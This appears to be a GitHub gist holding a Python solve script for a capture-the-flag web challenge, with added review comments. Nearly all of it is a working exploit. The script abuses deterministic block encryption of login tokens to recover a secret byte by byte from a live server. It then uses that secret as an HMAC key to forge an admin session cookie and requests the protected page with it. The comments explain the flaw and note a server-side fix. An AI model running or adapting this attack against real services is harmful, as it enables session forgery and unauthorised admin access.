@ducnhse130201
Created June 19, 2018 04:55
solve(Web-Token).py
import requests
import string
from base64 import *
from Crypto.Hash import HMAC
# Candidate characters tried for each position of the recovered value.
alpha = string.ascii_letters + string.digits
# Block length in bytes; the script compares 16-byte slices of the token.
BLOCK_SIZE = 16


def pad(s):
    """Return *s* extended to a multiple of BLOCK_SIZE, PKCS#7 style.

    Each appended character has the ordinal of the number of characters
    added; an input already on a block boundary gains one full extra block.
    """
    fill = BLOCK_SIZE - len(s) % BLOCK_SIZE
    return s + chr(fill) * fill
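def get_cookie(username):
    """Log in as *username* and return the decoded token from the reply.

    The ``token`` cookie is read from the login redirect, its last 32
    characters are dropped and the remainder is base64-decoded.  The script
    later rebuilds a cookie as base64 token + hex digest, so the dropped
    tail is presumably the hex MAC -- confirm against the server.

    Raises:
        RuntimeError: the login did not answer with a 302 redirect, or the
            redirect carried no ``token`` cookie.  The original fell through
            and returned None here, which only surfaced later as a TypeError
            when the caller sliced the result.
    """
    s = requests.Session()
    url = 'http://ec2-13-229-142-46.ap-southeast-1.compute.amazonaws.com:9999/login'
    # allow_redirects=False keeps the Set-Cookie of the 302 itself in r.cookies;
    # the timeout stops a stalled connection from hanging the script forever.
    r = s.post(url, data={'name': username}, allow_redirects=False, timeout=10)
    if r.status_code != 302:
        raise RuntimeError('login did not redirect (HTTP %d)' % r.status_code)
    cookie = r.cookies.get_dict().get('token')
    if cookie is None:
        raise RuntimeError('login response carried no token cookie')
    return b64decode(cookie[:-32])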
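# NOTE(review): written for Python 2 -- the original used print statements and
# concatenates the b64encode() result with a str further down.  print(x) with
# a single argument produces the same output on Python 2.

# The original never initialised `secret`, so the first `c + secret` raised
# NameError.  The value is built right to left, starting from the empty string.
secret = ''
for i in range(16):
    for c in alpha:
        # One padded guess block followed by filler.  The filler length
        # (12 + i) is presumably tuned to this challenge's token layout; the
        # page does not show the server side.
        payload = pad(c + secret) + 'a' * (12 + i)
        grep = get_cookie(payload)
        # With 15 characters known the guess fills a whole block, so pad()
        # adds a full padding block and the comparison moves one block back.
        if len(secret) == 15:
            matched = grep[:16] == grep[-32:-16]
        else:
            matched = grep[:16] == grep[-16:]
        if matched:
            secret = c + secret
            print(secret)
            # The original broke out only in the shorter case; stopping in
            # both avoids probing the remaining candidates after a match.
            break

# NOTE(review): equal ciphertext blocks for equal plaintext blocks only occur
# when the token is encrypted deterministically block by block (ECB-like), and
# the recovered value is then used as the HMAC key below -- both inferred from
# this script, not shown on the page.  If so, the server-side fix is
# authenticated encryption with a fresh nonce per token, and a MAC key that is
# never placed inside client-visible data.
data = 'peterjson' + ":admin"
# HMAC.new is called without a digestmod, so the library default is used; the
# 32-character tail stripped in get_cookie is consistent with an MD5-sized hex
# digest -- TODO confirm.
h = HMAC.new(secret.encode("utf-8"))
h.update(data.encode("utf-8"))
mac = h.hexdigest()
# Cookie layout mirrored from the server: base64(token) followed by hex MAC.
new_cre = b64encode(get_cookie('peterjson')) + mac
print('FOUND new_cre: ' + new_cre)
admin_cookie = dict(token=new_cre)
r = requests.get('http://ec2-13-229-142-46.ap-southeast-1.compute.amazonaws.com:9999/', cookies=admin_cookie, timeout=10)
print(r.text)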